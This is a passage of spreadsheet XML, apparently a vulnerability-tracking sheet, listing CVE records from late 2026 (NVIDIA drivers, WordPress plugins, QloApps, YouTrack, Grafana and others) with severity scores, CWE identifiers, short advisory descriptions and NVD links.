      <c r="E477" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F477" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G477" s="5" t="inlineStr"/>
      <c r="H477" s="5" t="inlineStr"/>
      <c r="I477" s="5" t="inlineStr"/>
      <c r="J477" s="5" t="inlineStr"/>
      <c r="K477" s="5" t="inlineStr"/>
      <c r="L477" s="5" t="inlineStr"/>
      <c r="M477" s="5" t="inlineStr"/>
      <c r="N477" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O477" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P477" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q477" s="5" t="inlineStr"/>
      <c r="R477" s="5" t="inlineStr">
        <is>
          <t>CWE-667</t>
        </is>
      </c>
      <c r="S477" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Windows contains a vulnerability in the kernel module where a user could cause improper locking. A successful exploit of this vulnerability might lead to denial of service.</t>
        </is>
      </c>
      <c r="T477" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47581</t>
        </is>
      </c>
    </row>
    <row r="478">
      <c r="A478" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B478" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C478" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47584</t>
        </is>
      </c>
      <c r="D478" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E478" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F478" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G478" s="5" t="inlineStr"/>
      <c r="H478" s="5" t="inlineStr"/>
      <c r="I478" s="5" t="inlineStr"/>
      <c r="J478" s="5" t="inlineStr"/>
      <c r="K478" s="5" t="inlineStr"/>
      <c r="L478" s="5" t="inlineStr"/>
      <c r="M478" s="5" t="inlineStr"/>
      <c r="N478" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O478" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P478" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q478" s="5" t="inlineStr"/>
      <c r="R478" s="5" t="inlineStr">
        <is>
          <t>CWE-476</t>
        </is>
      </c>
      <c r="S478" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Windows contains a vulnerability in the kernel module where an attacker with local access could cause a NULL pointer dereference. A successful exploit of this vulnerability might lead to denial of service.</t>
        </is>
      </c>
      <c r="T478" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47584</t>
        </is>
      </c>
    </row>
    <row r="479">
      <c r="A479" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B479" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C479" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47603</t>
        </is>
      </c>
      <c r="D479" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E479" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F479" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G479" s="5" t="inlineStr"/>
      <c r="H479" s="5" t="inlineStr"/>
      <c r="I479" s="5" t="inlineStr"/>
      <c r="J479" s="5" t="inlineStr"/>
      <c r="K479" s="5" t="inlineStr"/>
      <c r="L479" s="5" t="inlineStr"/>
      <c r="M479" s="5" t="inlineStr"/>
      <c r="N479" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O479" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P479" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q479" s="5" t="inlineStr"/>
      <c r="R479" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S479" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Windows and Linux contains a vulnerability in the kernel mode driver where a local user may access another process's GPU channel state due to missing authorization checks. A successful exploit of this vulnerability might lead to information disclosure.</t>
        </is>
      </c>
      <c r="T479" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47603</t>
        </is>
      </c>
    </row>
    <row r="480">
      <c r="A480" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B480" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C480" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47604</t>
        </is>
      </c>
      <c r="D480" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E480" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F480" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G480" s="5" t="inlineStr"/>
      <c r="H480" s="5" t="inlineStr"/>
      <c r="I480" s="5" t="inlineStr"/>
      <c r="J480" s="5" t="inlineStr"/>
      <c r="K480" s="5" t="inlineStr"/>
      <c r="L480" s="5" t="inlineStr"/>
      <c r="M480" s="5" t="inlineStr"/>
      <c r="N480" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O480" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P480" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q480" s="5" t="inlineStr"/>
      <c r="R480" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S480" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Windows and Linux contains a vulnerability in the kernel mode driver where a local user may access another process's GPU channel state due to missing authorization checks. A successful exploit of this vulnerability might lead to information disclosure.</t>
        </is>
      </c>
      <c r="T480" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47604</t>
        </is>
      </c>
    </row>
    <row r="481">
      <c r="A481" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B481" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C481" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97238</t>
        </is>
      </c>
      <c r="D481" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E481" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F481" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G481" s="5" t="inlineStr"/>
      <c r="H481" s="5" t="inlineStr"/>
      <c r="I481" s="5" t="inlineStr"/>
      <c r="J481" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K481" s="5" t="inlineStr"/>
      <c r="L481" s="5" t="inlineStr"/>
      <c r="M481" s="5" t="inlineStr"/>
      <c r="N481" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O481" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P481" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q481" s="5" t="inlineStr"/>
      <c r="R481" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S481" s="5" t="inlineStr">
        <is>
          <t>Subscriber Cross Site Scripting (XSS) in JetEngine &lt;= 3.8.14.3 versions.</t>
        </is>
      </c>
      <c r="T481" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97238</t>
        </is>
      </c>
    </row>
    <row r="482">
      <c r="A482" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B482" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C482" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100261</t>
        </is>
      </c>
      <c r="D482" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E482" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F482" s="5" t="inlineStr">
        <is>
          <t>cve@jetbrains.com</t>
        </is>
      </c>
      <c r="G482" s="5" t="inlineStr"/>
      <c r="H482" s="5" t="inlineStr"/>
      <c r="I482" s="5" t="inlineStr"/>
      <c r="J482" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K482" s="5" t="inlineStr"/>
      <c r="L482" s="5" t="inlineStr"/>
      <c r="M482" s="5" t="inlineStr"/>
      <c r="N482" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O482" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P482" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q482" s="5" t="inlineStr"/>
      <c r="R482" s="5" t="inlineStr">
        <is>
          <t>CWE-288</t>
        </is>
      </c>
      <c r="S482" s="5" t="inlineStr">
        <is>
          <t>In JetBrains YouTrack before 2026.2.18991 changing article visibility settings was possible without update permission</t>
        </is>
      </c>
      <c r="T482" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100261</t>
        </is>
      </c>
    </row>
    <row r="483">
      <c r="A483" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B483" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C483" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101883</t>
        </is>
      </c>
      <c r="D483" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E483" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F483" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G483" s="5" t="inlineStr"/>
      <c r="H483" s="5" t="inlineStr"/>
      <c r="I483" s="5" t="inlineStr"/>
      <c r="J483" s="5" t="inlineStr">
        <is>
          <t>requests</t>
        </is>
      </c>
      <c r="K483" s="5" t="inlineStr"/>
      <c r="L483" s="5" t="inlineStr"/>
      <c r="M483" s="5" t="inlineStr"/>
      <c r="N483" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O483" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P483" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q483" s="5" t="inlineStr"/>
      <c r="R483" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S483" s="5" t="inlineStr">
        <is>
          <t>OpenClaw Windows Node through 2026.9.4 contains a server-side request forgery vulnerability in the canvas.present capability that bypasses URL risk evaluation enforced by canvas.navigate. Attackers with gateway or agent access can issue canvas.present to make the node's WebView send requests to localhost, private networks, or tailnet services from the user's machine.</t>
        </is>
      </c>
      <c r="T483" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101883</t>
        </is>
      </c>
    </row>
    <row r="484">
      <c r="A484" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B484" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C484" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102134</t>
        </is>
      </c>
      <c r="D484" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E484" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F484" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G484" s="5" t="inlineStr"/>
      <c r="H484" s="5" t="inlineStr"/>
      <c r="I484" s="5" t="inlineStr"/>
      <c r="J484" s="5" t="inlineStr"/>
      <c r="K484" s="5" t="inlineStr"/>
      <c r="L484" s="5" t="inlineStr"/>
      <c r="M484" s="5" t="inlineStr"/>
      <c r="N484" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O484" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P484" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q484" s="5" t="inlineStr"/>
      <c r="R484" s="5" t="inlineStr">
        <is>
          <t>CWE-420</t>
        </is>
      </c>
      <c r="S484" s="5" t="inlineStr">
        <is>
          <t>Kiteworks Core did not apply its gateway-level API security controls to every request authenticated through the platform's central authentication service. An authenticated user could reach REST API functionality over a request path on which those controls, including enforcement of signed-out and revoked sessions, were not applied.</t>
        </is>
      </c>
      <c r="T484" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102134</t>
        </is>
      </c>
    </row>
    <row r="485">
      <c r="A485" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B485" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C485" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102399</t>
        </is>
      </c>
      <c r="D485" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E485" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F485" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G485" s="5" t="inlineStr"/>
      <c r="H485" s="5" t="inlineStr"/>
      <c r="I485" s="5" t="inlineStr"/>
      <c r="J485" s="5" t="inlineStr"/>
      <c r="K485" s="5" t="inlineStr"/>
      <c r="L485" s="5" t="inlineStr"/>
      <c r="M485" s="5" t="inlineStr"/>
      <c r="N485" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O485" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P485" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q485" s="5" t="inlineStr"/>
      <c r="R485" s="5" t="inlineStr">
        <is>
          <t>CWE-352</t>
        </is>
      </c>
      <c r="S485" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Cross Site Request Forgery (CSRF) in Photo Gallery by Supsystic &lt;= 1.21.0 versions.</t>
        </is>
      </c>
      <c r="T485" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102399</t>
        </is>
      </c>
    </row>
    <row r="486">
      <c r="A486" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B486" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C486" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103539</t>
        </is>
      </c>
      <c r="D486" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E486" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F486" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G486" s="5" t="inlineStr"/>
      <c r="H486" s="5" t="inlineStr"/>
      <c r="I486" s="5" t="inlineStr"/>
      <c r="J486" s="5" t="inlineStr"/>
      <c r="K486" s="5" t="inlineStr"/>
      <c r="L486" s="5" t="inlineStr"/>
      <c r="M486" s="5" t="inlineStr"/>
      <c r="N486" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O486" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="P486" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q486" s="5" t="inlineStr"/>
      <c r="R486" s="5" t="inlineStr">
        <is>
          <t>CWE-287, CWE-306</t>
        </is>
      </c>
      <c r="S486" s="5" t="inlineStr">
        <is>
          <t>A weakness has been identified in ZongXR SuperMarket 1.0.0.0. This affects the function startBuy of the file instant-buy/src/main/java/com/supermarket/instantbuy/controller/InstantBuyController.java of the component Instant Buy. Executing a manipulation of the argument Username can lead to missing authentication. The attack may be performed from remote. The exploit has been made available to the public and could be used for attacks. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="T486" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103539</t>
        </is>
      </c>
    </row>
    <row r="487">
      <c r="A487" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B487" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C487" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103587</t>
        </is>
      </c>
      <c r="D487" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E487" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F487" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G487" s="5" t="inlineStr"/>
      <c r="H487" s="5" t="inlineStr"/>
      <c r="I487" s="5" t="inlineStr"/>
      <c r="J487" s="5" t="inlineStr"/>
      <c r="K487" s="5" t="inlineStr"/>
      <c r="L487" s="5" t="inlineStr"/>
      <c r="M487" s="5" t="inlineStr"/>
      <c r="N487" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O487" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P487" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q487" s="5" t="inlineStr"/>
      <c r="R487" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S487" s="5" t="inlineStr">
        <is>
          <t>QloApps through 1.7.0 contains a reflected cross-site scripting vulnerability in the back-office Hotel Reservation System Book Now search, where date_to and id_room_type parameters are copied into template variables without validation. Attackers can craft a malicious link containing JavaScript payload in these parameters that executes in an authenticated administrator's session when the victim follows the link.</t>
        </is>
      </c>
      <c r="T487" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103587</t>
        </is>
      </c>
    </row>
    <row r="488">
      <c r="A488" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B488" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C488" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103588</t>
        </is>
      </c>
      <c r="D488" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E488" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F488" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G488" s="5" t="inlineStr"/>
      <c r="H488" s="5" t="inlineStr"/>
      <c r="I488" s="5" t="inlineStr"/>
      <c r="J488" s="5" t="inlineStr"/>
      <c r="K488" s="5" t="inlineStr"/>
      <c r="L488" s="5" t="inlineStr"/>
      <c r="M488" s="5" t="inlineStr"/>
      <c r="N488" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O488" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P488" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q488" s="5" t="inlineStr"/>
      <c r="R488" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S488" s="5" t="inlineStr">
        <is>
          <t>QloApps through 1.7.0 contains a reflected cross-site scripting vulnerability in the exceptions field of the back-office Transplant a module form. Attackers can craft a malicious link containing JavaScript payload in the exceptions parameter that executes in an authenticated administrator's session when the victim follows the link.</t>
        </is>
      </c>
      <c r="T488" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103588</t>
        </is>
      </c>
    </row>
    <row r="489">
      <c r="A489" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B489" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C489" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103589</t>
        </is>
      </c>
      <c r="D489" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E489" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F489" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G489" s="5" t="inlineStr"/>
      <c r="H489" s="5" t="inlineStr"/>
      <c r="I489" s="5" t="inlineStr"/>
      <c r="J489" s="5" t="inlineStr">
        <is>
          <t>requests</t>
        </is>
      </c>
      <c r="K489" s="5" t="inlineStr"/>
      <c r="L489" s="5" t="inlineStr"/>
      <c r="M489" s="5" t="inlineStr"/>
      <c r="N489" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O489" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P489" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q489" s="5" t="inlineStr"/>
      <c r="R489" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S489" s="5" t="inlineStr">
        <is>
          <t>QloApps through 1.7.0 contains a reflected cross-site scripting vulnerability in the back-office room type editor that fails to escape room_num, floor, and comment field values in input attributes. Attackers can induce authenticated back-office users to submit crafted POST requests with malicious payloads to execute arbitrary JavaScript in the victim's administrative session.</t>
        </is>
      </c>
      <c r="T489" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103589</t>
        </is>
      </c>
    </row>
    <row r="490">
      <c r="A490" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B490" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C490" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103590</t>
        </is>
      </c>
      <c r="D490" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E490" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F490" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G490" s="5" t="inlineStr"/>
      <c r="H490" s="5" t="inlineStr"/>
      <c r="I490" s="5" t="inlineStr"/>
      <c r="J490" s="5" t="inlineStr">
        <is>
          <t>requests</t>
        </is>
      </c>
      <c r="K490" s="5" t="inlineStr"/>
      <c r="L490" s="5" t="inlineStr"/>
      <c r="M490" s="5" t="inlineStr"/>
      <c r="N490" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O490" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P490" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q490" s="5" t="inlineStr"/>
      <c r="R490" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S490" s="5" t="inlineStr">
        <is>
          <t>QloApps through 1.7.0 contains a reflected cross-site scripting vulnerability in the back-office room type editor's length of stay fields. Attackers can induce authenticated administrators to submit crafted POST requests with malicious payloads in restriction_min_los and restriction_max_los parameters, executing arbitrary JavaScript in the victim's administrative session.</t>
        </is>
      </c>
      <c r="T490" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103590</t>
        </is>
      </c>
    </row>
    <row r="491">
      <c r="A491" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B491" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C491" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-12241</t>
        </is>
      </c>
      <c r="D491" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E491" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F491" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G491" s="5" t="inlineStr"/>
      <c r="H491" s="5" t="inlineStr"/>
      <c r="I491" s="5" t="inlineStr"/>
      <c r="J491" s="5" t="inlineStr">
        <is>
          <t>aws, gin</t>
        </is>
      </c>
      <c r="K491" s="5" t="inlineStr"/>
      <c r="L491" s="5" t="inlineStr"/>
      <c r="M491" s="5" t="inlineStr"/>
      <c r="N491" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O491" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="P491" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q491" s="5" t="inlineStr"/>
      <c r="R491" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S491" s="5" t="inlineStr">
        <is>
          <t>The Advanced Woo Labels – Product Labels &amp; Badges for WooCommerce plugin for WordPress is vulnerable to unauthorized modification of data due to an improperly secure capability check on the 'save_meta_boxes' function in all versions up to, and including, 2.51. This makes it possible for authenticated attackers, with Contributor-level access and above, to create AWS labels that are rendered without proper escaping. The vulnerability was partially patched in version 2.46.</t>
        </is>
      </c>
      <c r="T491" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-12241</t>
        </is>
      </c>
    </row>
    <row r="492">
      <c r="A492" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B492" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C492" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-13720</t>
        </is>
      </c>
      <c r="D492" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E492" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F492" s="5" t="inlineStr">
        <is>
          <t>security@grafana.com</t>
        </is>
      </c>
      <c r="G492" s="5" t="inlineStr"/>
      <c r="H492" s="5" t="inlineStr"/>
      <c r="I492" s="5" t="inlineStr"/>
      <c r="J492" s="5" t="inlineStr"/>
      <c r="K492" s="5" t="inlineStr"/>
      <c r="L492" s="5" t="inlineStr"/>
      <c r="M492" s="5" t="inlineStr"/>
      <c r="N492" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O492" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P492" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q492" s="5" t="inlineStr"/>
      <c r="R492" s="5" t="inlineStr">
        <is>
          <t>CWE-285, CWE-345, CWE-915</t>
        </is>
      </c>
      <c r="S492" s="5" t="inlineStr">
        <is>
          <t>An Editor can set file-provisioning metadata (the grafana.app/managedBy, grafana.app/managerId and grafana.app/sourcePath annotations) when creating a dashboard through the dashboard API, because these fields were stored without an authorization check. The dashboard then appears file-provisioned, and administrators can no longer update or delete it through Grafana. The impact is limited to the same organization and no data is exposed.</t>
        </is>
      </c>
      <c r="T492" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-13720</t>
        </is>
      </c>
    </row>
    <row r="493">
      <c r="A493" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B493" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C493" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62081</t>
        </is>
      </c>
      <c r="D493" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E493" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F493" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G493" s="5" t="inlineStr"/>
      <c r="H493" s="5" t="inlineStr"/>
      <c r="I493" s="5" t="inlineStr"/>
      <c r="J493" s="5" t="inlineStr"/>
      <c r="K493" s="5" t="inlineStr"/>
      <c r="L493" s="5" t="inlineStr"/>
      <c r="M493" s="5" t="inlineStr"/>
      <c r="N493" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O493" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P493" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q493" s="5" t="inlineStr"/>
      <c r="R493" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
